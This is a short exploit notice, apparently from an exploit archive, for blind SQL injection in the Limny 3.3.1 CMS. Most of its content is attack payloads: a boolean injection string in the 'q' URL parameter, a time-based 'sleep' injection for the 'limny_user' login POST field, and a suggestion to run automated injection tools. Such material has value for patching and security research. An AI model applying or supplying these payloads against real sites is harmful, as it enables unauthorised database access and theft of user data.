Limny version 3.3.1 suffers from a remote blind SQL injection vulnerability.
afe1728c22b27e47b419699f63dbddefc56b99cc5a392d1aa6cf7d85188cf1ef
###########################################
### Exploit Title: Limny v 3.3.1 Blind SQL Injection
### Date: 31/7/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link: http://www.limny.org/releases/limny-3.3.1.zip
### Tested on: Linux/Windows
############################################
# Example 1:
http://127.0.0.1/limny-3.3.1/index.php?q=-1' or 57 = '55
# Example 2:
http://127.0.0.1/limny-3.3.1/index.php?q=-/login
POST in limny_user some mysql time injection like :
' or (sleep(1)+1) limit 1 --
# Note :
If you are lazy, use some automatic Blind SQL Injection :)
# Greetz to my friendz